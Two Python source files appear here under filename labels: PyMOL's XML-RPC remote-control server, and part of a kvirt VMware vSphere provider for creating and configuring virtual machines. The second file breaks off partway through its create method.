rpc.py
|
""" an XML-RPC server to allow remote control of PyMol
Author: Greg Landrum (glandrum@users.sourceforge.net)
Created: January 2002
$LastChangedDate$
License: PyMol
Requires:
- a python xmlrpclib distribution containing the SimpleXMLRPCServer
module (1.0 or greater should be fine)
- python with threading enabled
RD Version: $Rev$
Modified 2013-04-17 Thomas Holder, Schrodinger, Inc.
"""
from __future__ import print_function
import sys
if sys.version_info[0] == 2:
import SimpleXMLRPCServer
else:
import xmlrpc.server as SimpleXMLRPCServer
import threading,os,tempfile
from pymol import cmd,cgo
# initial port to try for the server
_xmlPort=9123
# number of alternate ports to try if the first fails
_nPortsToTry=5
def rpcPing():
""" Used to establish whether or not the server is alive.
This is a good thing to call after establishing a connection just to
make sure that everything is ok.
Returns 1
"""
return 1
def rpcLabel(pos,labelText,id='lab1',color=(1,1,1)):
""" create a text label
Arguments:
pos: a 3 tuple with the position of the label
text: a string with the label
color: a 3 tuple with the color of the label. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
NOTE:
at the moment this is, how you say, a hack
"""
cmd.pseudoatom(id, label=repr(labelText), elem='C', pos=pos)
cmd.set_color("%s-color"%id,color)
cmd.color("%s-color"%id,id)
return 1
def rpcResetCGO(id):
""" removes a CGO from the local dictionary
"""
global cgoDict
if id=="*":
cgoDict={}
res = 1
elif id in cgoDict:
del(cgoDict[id])
res = 1
else:
res = 0
return res
def rpcSphere(pos,rad,color,id='cgo',extend=1,
transparent=0,transparency=0.5):
""" create a sphere
Arguments:
pos: a 3 tuple with the position of the sphere
rad: a float with the radius
color: a 3 tuple with the color of the sphere. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the sphere is appended to any
existing object with this id. Otherwise the object is cleared
before adding the sphere
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
"""
r,g,b = color
x,y,z = pos
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcRenderCGO(cgoV,id='cgo',extend=1):
""" renders a CGO vector
Arguments:
cgoV: a vector of floats
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the CGO is appended to any
existing object with this id. Otherwise the object is cleared
before adding the CGO
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
obj.extend(cgoV)
cmd.load_cgo(obj,id,1)
return 1
def rpcSpheres(sphereD,id='cgo',extend=1):
""" create a sphere
Arguments:
sphereD: a series of (pos,rad,color,transparent,transparency) tuples
id: (OPTIONAL) the name of the object to be created
extend: (OPTIONAL) if this is nonzero, the spheres are appended to any
existing object with this id. Otherwise the object is cleared
before adding the spheres
"""
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
for pos,rad,color,transparent,transparency in sphereD:
r,g,b = color
x,y,z = pos
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.COLOR,r,g,b,cgo.SPHERE,x,y,z,rad])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcCylinder(end1,end2,rad,color1,id='cgo',color2=None,extend=1,
transparent=0,transparency=0.5):
""" create a cylinder
Arguments:
end1: a 3 tuple with the position of end1 of the cylinder
end2: a 3 tuple with the position of end2 of the cylinder
rad: a float with the radius
color1: a 3 tuple with the color of end1 of the cylinder. (1,1,1) is white
id: (OPTIONAL) the name of the object to be created
color2: (OPTIONAL) a 3 tuple with the color of end2 of the cylinder. (1,1,1)
is white
extend: (OPTIONAL) if this is nonzero, the cylinder is appended to any
existing object with this id. Otherwise the object is cleared
before adding the cylinder
transparent: (OPTIONAL) sets the object to be transparent
transparency: (OPTIONAL) the percent transparency of the object
NOTE: the reason that color2 follows id is that I think clients are
going to be interested in setting the id more often than they are going
to care about the second color.
"""
global cgoDict
if color2 is None: color2 = color1
r1,g1,b1 = color1
r2,g2,b2 = color2
x1,y1,z1 = end1
x2,y2,z2 = end2
if extend:
obj = cgoDict.get(id,[])
else:
obj = []
if not transparent:
o = []
else:
o = [cgo.ALPHA,1-transparency]
o.extend([cgo.CYLINDER,x1,y1,z1,x2,y2,z2,rad,r1,g1,b1,r2,g2,b2,])
obj.extend(o)
cgoDict[id] = obj
cmd.load_cgo(obj,id,1)
return 1
def rpcDeleteObject(objName):
""" deletes an object """
try:
cmd.delete(objName)
except:
res = 0
else:
res = 1
return res
def rpcDeleteAll():
""" deletes all objects """
res = cmd.delete('all')
if res is not None:
return res
else:
return ''
def colorObj(objName,colorScheme):
""" sets an molecule's color scheme
Arguments:
- objName: the object (molecule) to change
- colorScheme: name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
"""
if colorScheme:
if colorScheme == 'std':
# this is an adaptation of the cbag scheme from util.py, but
# with a gray carbon.
cmd.color("magenta","("+objName+")",quiet=1)
cmd.color("oxygen","(elem O and "+objName+")",quiet=1)
cmd.color("nitrogen","(elem N and "+objName+")",quiet=1)
cmd.color("sulfur","(elem S and "+objName+")",quiet=1)
cmd.color("hydrogen","(elem H and "+objName+")",quiet=1)
cmd.color("gray","(elem C and "+objName+")",quiet=1)
elif hasattr(utils,colorScheme):
fn = getattr(utils,colorScheme)
fn(objName,quiet=1)
res = 1
else:
res = 0
return res
def rpcLoadPDB(data,objName,colorScheme='',replace=1):
""" loads a molecule from a pdb string
Arguments:
data: the PDB block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_pdbstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadMolBlock(data,objName,colorScheme='',replace=1):
""" loads a molecule from a mol block
Arguments:
data: the mol block
objName: name of the object to create
colorScheme: (OPTIONAL) name of the color scheme to use
for the molecule (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
from pymol import util
if replace:
cmd.delete(objName)
res = cmd.read_molstr(data,objName)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadFile(fileName,objName='',format='',colorScheme='',replace=1):
""" loads an object from a file
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
colorScheme: (OPTIONAL) name of the color scheme to use
for the object (should be either 'std' or one of the
color schemes defined in pymol.utils)
replace: (OPTIONAL) if an object with the same name already
exists, delete it before adding this one
"""
if not objName:
objName = fileName.split('.')[0]
if replace:
cmd.delete(objName)
res = cmd.load(fileName,objName,format=format)
colorObj(objName,colorScheme)
if res is not None:
return res
else:
return ''
def rpcLoadSurface(fileName,objName,format='',surfaceLevel=1.0):
""" loads surface data from a file and adds an isosurface
Arguments:
fileName: the file to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
if not objName:
objName = fileName.split('.')[0]
gridName = 'grid-%s'%objName
res = cmd.load(fileName,gridName,format='')
cmd.isosurface(objName,gridName,level=surfaceLevel)
if res is not None:
return res
else:
return ''
def rpcLoadSurfaceData(data,objName='surface',format='',surfaceLevel=1.0):
""" loads surface data from a string and adds an isosurface
Arguments:
data: the data to load
objName: (OPTIONAL) name of the object to create
format: (OPTIONAL) the format of the input file
surfaceLevel: (OPTIONAL) the isosurface level
"""
gridName = 'grid-%s'%objName
# it would be nice if we didn't have to go by way of the temporary file,
# but at the moment pymol will only read shapes from files
tempnm = tempfile.mktemp('.grd')
open(tempnm,'w+').write(data)
res = rpcLoadSurface(tempnm,objName,format='',surfaceLevel=surfaceLevel)
os.unlink(tempnm)
if res is not None:
return res
else:
return ''
def rpcRotate(vect,objName='',state=-1):
""" rotates objects
Arguments:
- vect: a sequence with x y and z rotations
- objName: (OPTIONAL) object to be rotated
- state: (OPTIONAL) if zero only visible states are rotated,
if -1 (the default), all states are rotated
"""
cmd.rotate('x',vect[0],objName,state=state)
cmd.rotate('y',vect[1],objName,state=state)
cmd.rotate('z',vect[2],objName,state=state)
return 1
def rpcGetNames(what='selections',enabledOnly=1):
""" returns the results of cmd.get_names(what) """
return cmd.get_names(what,enabled_only=enabledOnly)
def rpcIdAtom(what='all',mode=0):
""" returns the results of cmd.id_atom(what) """
return cmd.id_atom(what,mode=mode)
def rpcGetAtomCoords(what='all',state=0):
""" returns the results of cmd.get_atom_coords(what,state) """
return cmd.get_atom_coords(what,state=state)
def rpcHelp(what=''):
""" returns general help text or help on a particular command """
global serv
res = 'Command Not Found'
if not what:
res = list(serv.funcs.keys())
else:
funcs = serv.funcs
if what in funcs:
fn = funcs[what]
res = "Function: %s("%what
defs = fn.__defaults__
if defs:
code = fn.__code__
nDefs = len(defs)
args = []
i = -1
for i in range(code.co_argcount - nDefs):
args.append(code.co_varnames[i])
for j in range(nDefs):
vName = code.co_varnames[j+i+1]
args.append("%s=%s"%(vName,repr(defs[j])))
res += ','.join(args)
res += ')\n'
if fn.__doc__:
res += fn.__doc__
return res
def launch_XMLRPC(hostname='',port=_xmlPort,nToTry=_nPortsToTry):
""" launches the xmlrpc server into a separate thread
Arguments:
hostname: (OPTIONAL) name of the host for the server
(defaults to be the name of the localhost)
port: (OPTIONAL) the first port to try for the server
nToTry: (OPTIONAL) the number of possible ports to try
(in case the first can't be opened)
"""
if not hostname:
import os
hostname = os.environ.get('PYMOL_RPCHOST', 'localhost')
global cgoDict,serv
cgoDict = {}
for i in range(nToTry):
try:
serv = SimpleXMLRPCServer.SimpleXMLRPCServer((hostname,port+i),logRequests=0,
allow_none=True)
except:
serv = None
else:
break
if serv:
print('xml-rpc server running on host %s, port %d'%(hostname,port+i))
# import PyMOL API
from pymol import api
serv.register_instance(cmd)
# legacy stuff with unique names
serv.register_function(rpcPing,'ping')
serv.register_function(rpcResetCGO,'resetCGO')
serv.register_function(rpcRenderCGO,'renderCGO')
serv.register_function(rpcSphere,'sphere')
serv.register_function(rpcSpheres,'spheres')
serv.register_function(rpcCylinder,'cylinder')
serv.register_function(rpcDeleteObject,'deleteObject')
serv.register_function(rpcDeleteAll,'deleteAll')
serv.register_function(rpcLoadPDB,'loadPDB')
serv.register_function(rpcLoadMolBlock,'loadMolBlock')
serv.register_function(rpcLoadSurface,'loadSurface')
serv.register_function(rpcLoadSurfaceData,'loadSurfaceData')
serv.register_function(rpcLoadFile,'loadFile')
serv.register_function(rpcGetNames,'getNames')
serv.register_function(api.count_atoms,'countAtoms')
serv.register_function(rpcIdAtom,'idAtom')
serv.register_function(rpcHelp,'help')
serv.register_function(rpcGetAtomCoords,'getAtomCoords')
# legacy stuff, should be removed because overwrites API names!
serv.register_function(rpcLabel,'label') # pseudoatom
serv.register_function(rpcRotate,'rotate')
serv.register_introspection_functions()
t = threading.Thread(target=serv.serve_forever)
t.setDaemon(1)
t.start()
else:
print('xml-rpc server could not be started')
# vi:expandtab:smarttab:sw=2
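# Illustrative client-side usage (a sketch; assumes the server above was started with
# launch_XMLRPC() and is reachable on localhost:9123, the defaults defined above -- the host
# and port may differ in practice). The function is only an example and is never called here.
def _exampleClientUsage():
    try:
        from xmlrpc.client import ServerProxy  # Python 3
    except ImportError:
        from xmlrpclib import ServerProxy      # Python 2
    srv = ServerProxy('http://localhost:%d' % _xmlPort)
    srv.ping()                                     # returns 1 if the server is alive
    srv.sphere((0., 0., 0.), 1.0, (1., 0., 0.))    # draw a red unit sphere at the origin
    srv.cylinder((0., 0., 0.), (0., 0., 3.), 0.3, (0., 1., 0.))  # green cylinder along z
    return srv.help()                              # list the registered functions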
|
__init__.py
|
#!/usr/bin/python
import base64
from binascii import hexlify
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from distutils.spawn import find_executable
from kvirt import common
from kvirt.common import error, pprint, warning
from kvirt.defaults import UBUNTUS, METADATA_FIELDS
from math import ceil
from pyVmomi import vim, vmodl
from pyVim import connect
import json
import os
import re
import requests
import random
from ssl import _create_unverified_context, get_server_certificate
import tarfile
from tempfile import TemporaryDirectory
from threading import Thread
import time
import pyVmomi
import webbrowser
from zipfile import ZipFile
def waitForMe(t):
while t.info.state not in [vim.TaskInfo.State.success, vim.TaskInfo.State.error]:
time.sleep(1)
if t.info.state == vim.TaskInfo.State.error:
error(t.info.description)
error(t.info.error)
os._exit(1)
def collectproperties(si, view, objtype, pathset=None, includemors=False):
collector = si.content.propertyCollector
# Create object specification to define the starting point of
# inventory navigation
objspec = pyVmomi.vmodl.query.PropertyCollector.ObjectSpec()
objspec.obj = view
objspec.skip = True
# Create a traversal specification to identify the path for collection
traversalspec = pyVmomi.vmodl.query.PropertyCollector.TraversalSpec()
traversalspec.name = 'traverseEntities'
traversalspec.path = 'view'
traversalspec.skip = False
traversalspec.type = view.__class__
objspec.selectSet = [traversalspec]
# Identify the properties to be retrieved
propertyspec = pyVmomi.vmodl.query.PropertyCollector.PropertySpec()
propertyspec.type = objtype
if not pathset:
propertyspec.all = True
propertyspec.pathSet = pathset
# Add the object and property specification to the
# property filter specification
filterspec = pyVmomi.vmodl.query.PropertyCollector.FilterSpec()
filterspec.objectSet = [objspec]
filterspec.propSet = [propertyspec]
# Retrieve properties
props = collector.RetrieveContents([filterspec])
data = []
for obj in props:
properties = {}
for prop in obj.propSet:
properties[prop.name] = prop.val
if includemors:
properties['obj'] = obj.obj
data.append(properties)
return data
def find(si, folder, vimtype, name):
o = si.content.viewManager.CreateContainerView(folder, [vimtype], True)
view = o.view
o.Destroy()
element = None
for e in view:
if e.name == name:
element = e
break
return element
def findvm(si, folder, name):
view = si.content.viewManager.CreateContainerView(folder, [vim.VirtualMachine], True)
vmlist = collectproperties(si, view=view, objtype=vim.VirtualMachine, pathset=['name'], includemors=True)
vm = list(filter(lambda v: v['name'] == name, vmlist))
if len(vm) >= 1:
return vm[-1]['obj']
else:
return None
def convert(octets, GB=True):
# return str(float(octets) / 1024 / 1024 / 1024) + "GB"
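# e.g. convert(20 * 1024 ** 3) returns "20GB" and convert(20 * 1024 ** 3, GB=False) returns "20".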
result = str(ceil(float(octets) / 1024 / 1024 / 1024))
if GB:
result += "GB"
return result
def dssize(ds):
di = ds.summary
return convert(di.capacity), convert(di.freeSpace)
def makecuspec(name, nets=[], gateway=None, dns=None, domain=None):
customspec = vim.vm.customization.Specification()
ident = vim.vm.customization.LinuxPrep()
ident.hostName = vim.vm.customization.FixedName()
ident.hostName.name = name
globalip = vim.vm.customization.GlobalIPSettings()
if domain:
ident.domain = domain
customspec.identity = ident
if dns is not None or domain is not None:
if dns is not None:
globalip.dnsServerList = [dns]
# if dns2:
# globalip.dnsServerList.append(dns2)
if domain is not None:
globalip.dnsSuffixList = domain
customspec.globalIPSettings = globalip
adaptermaps = []
for index, net in enumerate(nets):
if isinstance(net, str) or (len(net) == 1 and 'name' in net):
if index == 0:
continue
# nicname = "eth%d" % index
ip = None
netmask = None
# noconf = None
# vips = []
elif isinstance(net, dict):
# nicname = net.get('nic', "eth%d" % index)
ip = net.get('ip')
netmask = next((e for e in [net.get('mask'), net.get('netmask')] if e is not None), None)
# noconf = net.get('noconf')
# vips = net.get('vips')
if ip is not None and netmask is not None and gateway is not None and domain is not None:
guestmap = vim.vm.customization.AdapterMapping()
guestmap.adapter = vim.vm.customization.IPSettings()
guestmap.adapter.ip = vim.vm.customization.FixedIp()
guestmap.adapter.ip.ipAddress = ip
guestmap.adapter.subnetMask = netmask
guestmap.adapter.gateway = gateway
guestmap.adapter.dnsDomain = domain
adaptermaps.append(guestmap)
customspec.nicSettingMap = adaptermaps
return customspec
def createnicspec(nicname, netname, nictype=None):
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
if nictype == 'pcnet32':
nic = vim.vm.device.VirtualPCNet32()
elif nictype == 'e1000':
nic = vim.vm.device.VirtualE1000()
elif nictype == 'e1000e':
nic = vim.vm.device.VirtualE1000e()
else:
nic = vim.vm.device.VirtualVmxnet3()
desc = vim.Description()
desc.label = nicname
nicbacking = vim.vm.device.VirtualEthernetCard.NetworkBackingInfo()
desc.summary = netname
nicbacking.deviceName = netname
nic.backing = nicbacking
# nic.key = 0
nic.deviceInfo = desc
nic.addressType = 'generated'
nicspec.device = nic
return nicspec
def createdvsnicspec(nicname, netname, switchuuid, portgroupkey, nictype=None):
nicspec = vim.vm.device.VirtualDeviceSpec()
nicspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
if nictype == 'pcnet32':
nic = vim.vm.device.VirtualPCNet32()
elif nictype == 'e1000':
nic = vim.vm.device.VirtualE1000()
elif nictype == 'e1000e':
nic = vim.vm.device.VirtualE1000e()
else:
nic = vim.vm.device.VirtualVmxnet3()
dnicbacking = vim.vm.device.VirtualEthernetCard.DistributedVirtualPortBackingInfo()
dvconnection = vim.dvs.DistributedVirtualSwitchPortConnection()
dvconnection.switchUuid = switchuuid
dvconnection.portgroupKey = portgroupkey
dnicbacking.port = dvconnection
nic.backing = dnicbacking
nicspec.device = nic
return nicspec
def createscsispec():
ckey = 1000
# SCSISPEC
scsispec = vim.vm.device.VirtualDeviceSpec()
scsispec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
# scsictrl = vim.vm.device.VirtualLsiLogicController()
scsictrl = vim.vm.device.ParaVirtualSCSIController()
scsictrl.key = ckey
scsictrl.busNumber = 0
scsictrl.sharedBus = vim.vm.device.VirtualSCSIController.Sharing.noSharing
scsispec.device = scsictrl
return scsispec
def creatediskspec(number, disksize, ds, diskmode, thin=False):
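# Note: disksize here is expected in KB (vim.vm.device.VirtualDisk.capacityInKB); the create()
# method below converts from GB with disksize * 1048576 before calling this helper.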
ckey = 1000
diskspec = vim.vm.device.VirtualDeviceSpec()
diskspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
diskspec.fileOperation = vim.vm.device.VirtualDeviceSpec.FileOperation.create
vd = vim.vm.device.VirtualDisk()
vd.capacityInKB = disksize
diskspec.device = vd
vd.unitNumber = number
vd.controllerKey = ckey
diskfilebacking = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
filename = "[" + ds.name + "]"
diskfilebacking.fileName = filename
diskfilebacking.diskMode = diskmode
diskfilebacking.thinProvisioned = True if thin else False
vd.backing = diskfilebacking
return diskspec
def createcdspec():
# http://books.google.es/books?id=SdsnGmhF0QEC&pg=PA145&lpg=PA145&dq=VirtualCdrom%2Bspec&source=bl&ots=s8O2mw437-&sig=JpEo-AqmDV42b3fxpTcCt4xknEA&hl=es&sa=X&ei=KgGfT_DqApOy8QOl07X6Dg&redir_esc=y#v=onepage&q=VirtualCdrom%2Bspec&f=false
cdspec = vim.vm.device.VirtualDeviceSpec()
cdspec.setOperation(vim.vm.device.VirtualDeviceSpec.Operation.add)
cd = vim.vm.device.VirtualCdrom()
cdbacking = vim.vm.device.VirtualCdrom.AtapiBackingInfo()
cd.backing = cdbacking
cd.controllerKey = 201
cd.unitNumber = 0
cd.key = -1
cdspec.device = cd
return cdspec
def createisospec(iso=None):
cdspec = vim.vm.device.VirtualDeviceSpec()
cdspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
connect = vim.vm.device.VirtualDevice.ConnectInfo()
connect.startConnected = True
connect.allowGuestControl = True
connect.connected = False
cd = vim.vm.device.VirtualCdrom()
cd.connectable = connect
cdbacking = vim.vm.device.VirtualCdrom.IsoBackingInfo()
if iso is not None:
cdbacking.fileName = iso
cd.backing = cdbacking
cd.controllerKey = 201
cd.unitNumber = 0
cd.key = -1
cdspec.device = cd
return cdspec
def createclonespec(pool):
clonespec = vim.vm.CloneSpec()
relocatespec = vim.vm.RelocateSpec()
relocatespec.pool = pool
clonespec.location = relocatespec
clonespec.powerOn = False
clonespec.template = False
return clonespec
def create_filter_spec(pc, vms):
objSpecs = []
for vm in vms:
objSpec = vmodl.query.PropertyCollector.ObjectSpec(obj=vm)
objSpecs.append(objSpec)
filterSpec = vmodl.query.PropertyCollector.FilterSpec()
filterSpec.objectSet = objSpecs
propSet = vmodl.query.PropertyCollector.PropertySpec(all=False)
propSet.type = vim.VirtualMachine
propSet.pathSet = ['config.extraConfig.plan']
filterSpec.propSet = [propSet]
return filterSpec
def filter_results(results):
vms = []
for o in results.objects:
if o.propSet[0].val is not None:
vms.append(o.obj)
return vms
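# Illustrative sketch (an assumption about intended usage, not called elsewhere in this file):
# create_filter_spec and filter_results are meant to be combined with the vSphere property
# collector to keep only the VMs whose extraConfig carries a 'plan' entry. 'si' and 'vms' are
# assumed to come from an existing connection and container view.
def _filter_vms_with_plan(si, vms):
    pc = si.content.propertyCollector
    filterspec = create_filter_spec(pc, vms)
    options = vmodl.query.PropertyCollector.RetrieveOptions()
    result = pc.RetrievePropertiesEx(specSet=[filterspec], options=options)
    return filter_results(result) if result is not None else []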
def changecd(si, vm, iso):
virtual_cdrom_device = None
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualCdrom):
virtual_cdrom_device = dev
cdromspec = vim.vm.device.VirtualDeviceSpec()
cdromspec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit
cdromspec.device = vim.vm.device.VirtualCdrom()
cdromspec.device.controllerKey = virtual_cdrom_device.controllerKey
cdromspec.device.key = virtual_cdrom_device.key
cdromspec.device.connectable = vim.vm.device.VirtualDevice.ConnectInfo()
cdromspec.device.backing = vim.vm.device.VirtualCdrom.IsoBackingInfo()
cdromspec.device.backing.fileName = iso
cdromspec.device.connectable.connected = True
cdromspec.device.connectable.startConnected = True
cdromspec.device.connectable.allowGuestControl = True
dev_changes = []
dev_changes.append(cdromspec)
spec = vim.vm.ConfigSpec()
spec.deviceChange = dev_changes
task = vm.ReconfigVM_Task(spec=spec)
return task
raise RuntimeError("No cdrom found")
def createfolder(si, parentfolder, folder):
if find(si, parentfolder, vim.Folder, folder) is None:
parentfolder.CreateFolder(folder)
return None
def deletefolder(si, parentfolder, folder):
folder = find(si, parentfolder, vim.Folder, folder)
if folder is not None:
folder.Destroy()
def deletedirectory(si, dc, path):
d = si.content.fileManager.DeleteFile(path, dc)
waitForMe(d)
def keep_lease_alive(lease):
while(True):
time.sleep(5)
try:
lease.HttpNfcLeaseProgress(50)
if (lease.state == vim.HttpNfcLease.State.done):
return
except:
return
class Ksphere:
def __init__(self, host, user, password, datacenter, cluster, debug=False, isofolder=None,
filtervms=False, filteruser=False, filtertag=None):
# 4-1-CONNECT
si = connect.SmartConnect(host=host, port=443, user=user, pwd=password, sslContext=_create_unverified_context())
self.conn = si
self.si = si
self.vcip = host
self.url = "https://%s:%s@%s/sdk" % (user, password, host)
self.user = user
self.password = password
self.rootFolder = si.content.rootFolder
self.dc = find(si, self.rootFolder, vim.Datacenter, datacenter)
self.macaddr = []
self.clu = cluster
self.isofolder = isofolder
self.filtervms = filtervms
self.filteruser = filteruser
self.filtertag = filtertag
self.debug = debug
self.networks = []
view = si.content.viewManager.CreateContainerView(self.rootFolder, [vim.Network], True)
netlist = collectproperties(si, view=view, objtype=vim.Network, pathset=['name'], includemors=True)
for o in netlist:
self.networks.append(o['obj'].name)
portgs = {}
o = si.content.viewManager.CreateContainerView(self.rootFolder, [vim.DistributedVirtualSwitch], True)
dvnetworks = o.view
o.Destroy()
for dvnetw in dvnetworks:
uuid = dvnetw.uuid
for portg in dvnetw.portgroup:
portgs[portg.name] = [uuid, portg.key]
self.portgs = portgs
return
def close(self):
self.si.content.sessionManager.Logout()
def exists(self, name):
si = self.si
dc = self.dc
vmFolder = dc.vmFolder
vm = findvm(si, vmFolder, name)
return True if vm is not None else False
def net_exists(self, name):
print("not implemented")
return
def create(self, name, virttype=None, profile='kvirt', flavor=None, plan='kvirt', cpumodel='host-model',
cpuflags=[], cpupinning=[], numcpus=2, memory=512, guestid='centos7_64Guest', pool='default', image=None,
disks=[{'size': 10}], disksize=10, diskthin=True, diskinterface='virtio', nets=['default'], iso=None,
vnc=False, cloudinit=True, reserveip=False, reservedns=False, reservehost=False, start=True, keys=None,
cmds=[], ips=None, netmasks=None, gateway=None, nested=True, dns=None, domain=None, tunnel=False,
files=[], enableroot=True, overrides={}, tags=[], storemetadata=False, sharedfolders=[],
kernel=None, initrd=None, cmdline=None, placement=[], autostart=False, cpuhotplug=False,
memoryhotplug=False, numamode=None, numa=[], pcidevices=[], tpm=False, rng=False, metadata={},
securitygroups=[]):
dc = self.dc
vmFolder = dc.vmFolder
diskmode = 'persistent'
default_diskinterface = diskinterface
default_diskthin = diskthin
default_disksize = disksize
default_pool = pool
memory = int(memory)
numcpus = int(numcpus)
si = self.si
rootFolder = self.rootFolder
cluster = overrides.get('cluster')
if cluster is not None:
createfolder(si, dc.vmFolder, cluster)
vmfolder = find(si, dc.vmFolder, vim.Folder, cluster)
elif plan != 'kvirt':
createfolder(si, dc.vmFolder, plan)
vmfolder = find(si, dc.vmFolder, vim.Folder, plan)
else:
vmfolder = dc.vmFolder
si = self.si
clu = find(si, rootFolder, vim.ComputeResource, self.clu)
resourcepool = clu.resourcePool
if image is not None:
rootFolder = self.rootFolder
imageobj = findvm(si, rootFolder, image)
if imageobj is None:
return {'result': 'failure', 'reason': "Image %s not found" % image}
clonespec = createclonespec(resourcepool)
confspec = vim.vm.ConfigSpec()
confspec.annotation = name
confspec.memoryMB = memory
confspec.numCPUs = numcpus
extraconfig = []
for entry in [field for field in metadata if field in METADATA_FIELDS]:
opt = vim.option.OptionValue()
opt.key = entry
opt.value = metadata[entry]
extraconfig.append(opt)
clonespec.config = confspec
clonespec.powerOn = False
cloudinitiso = None
if cloudinit:
if image is not None and common.needs_ignition(image):
version = common.ignition_version(image)
ignitiondata = common.ignition(name=name, keys=keys, cmds=cmds, nets=nets, gateway=gateway, dns=dns,
domain=domain, reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides, version=version,
plan=plan, image=image)
ignitionopt = vim.option.OptionValue()
ignitionopt.key = 'guestinfo.ignition.config.data'
ignitionopt.value = base64.b64encode(ignitiondata.encode()).decode()
encodingopt = vim.option.OptionValue()
encodingopt.key = 'guestinfo.ignition.config.data.encoding'
encodingopt.value = 'base64'
extraconfig.extend([ignitionopt, encodingopt])
else:
gcmds = []
if image is not None and 'cos' not in image and 'fedora-coreos' not in image:
lower = image.lower()
if lower.startswith('fedora') or lower.startswith('rhel') or lower.startswith('centos'):
gcmds.append('yum -y install open-vm-tools')
elif lower.startswith('debian') or [x for x in UBUNTUS if x in lower] or 'ubuntu' in lower:
gcmds.append('apt-get update')
gcmds.append('apt-get -f install open-vm-tools')
gcmds.append('systemctl enable --now vmtoolsd')
index = 0
if image is not None and image.startswith('rhel'):
subindex = [i for i, value in enumerate(cmds) if value.startswith('subscription-manager')]
if subindex:
index = subindex.pop() + 1
cmds = cmds[:index] + gcmds + cmds[index:]
# customspec = makecuspec(name, nets=nets, gateway=gateway, dns=dns, domain=domain)
# clonespec.customization = customspec
isofolder = self.isofolder if self.isofolder is not None else "[%s]/%s" % (default_pool, name)
cloudinitiso = "%s/%s.ISO" % (isofolder, name)
userdata, meta, netdata = common.cloudinit(name=name, keys=keys, cmds=cmds, nets=nets,
gateway=gateway, dns=dns, domain=domain,
reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides,
storemetadata=storemetadata, machine='vsphere',
image=image)
confspec.extraConfig = extraconfig
t = imageobj.CloneVM_Task(folder=vmfolder, name=name, spec=clonespec)
waitForMe(t)
if cloudinitiso is not None:
with TemporaryDirectory() as tmpdir:
common.make_iso(name, tmpdir, userdata, meta, netdata)
cloudinitisofile = "%s/%s.ISO" % (tmpdir, name)
if self.isofolder is not None:
isofolder = self.isofolder.split('/')
isopool = re.sub(r"[\[\]]", '', isofolder[0])
isofolder = isofolder[1]
else:
isopool = default_pool
isofolder = None
self._uploadimage(isopool, cloudinitisofile, name, isofolder=isofolder)
vm = findvm(si, vmFolder, name)
c = changecd(self.si, vm, cloudinitiso)
waitForMe(c)
datastores = {}
confspec = vim.vm.ConfigSpec()
confspec.name = name
confspec.annotation = name
confspec.memoryMB = memory
confspec.numCPUs = numcpus
confspec.extraConfig = []
for entry in [field for field in metadata if field in METADATA_FIELDS]:
opt = vim.option.OptionValue()
opt.key = entry
opt.value = metadata[entry]
confspec.extraConfig.append(opt)
if nested:
confspec.nestedHVEnabled = True
confspec.guestId = 'centos7_64Guest'
vmfi = vim.vm.FileInfo()
filename = "[" + default_pool + "]"
vmfi.vmPathName = filename
confspec.files = vmfi
if vnc:
vncport = random.randint(5900, 7000)
opt1 = vim.option.OptionValue()
opt1.key = 'RemoteDisplay.vnc.port'
opt1.value = vncport
opt2 = vim.option.OptionValue()
opt2.key = 'RemoteDisplay.vnc.enabled'
opt2.value = "TRUE"
confspec.extraConfig = [opt1, opt2]
if image is None:
t = vmfolder.CreateVM_Task(confspec, resourcepool)
waitForMe(t)
vm = find(si, dc.vmFolder, vim.VirtualMachine, name)
currentdevices = vm.config.hardware.device
currentdisks = [d for d in currentdevices if isinstance(d, vim.vm.device.VirtualDisk)]
currentnics = [d for d in currentdevices if isinstance(d, vim.vm.device.VirtualEthernetCard)]
confspec = vim.vm.ConfigSpec()
devconfspec = []
for index, disk in enumerate(disks):
if disk is None:
disksize = default_disksize
diskthin = default_diskthin
diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, int):
disksize = disk
diskthin = default_diskthin
diskinterface = default_diskinterface
diskpool = default_pool
elif isinstance(disk, str) and disk.isdigit():
disksize = int(disk)
diskthin = default_diskthin
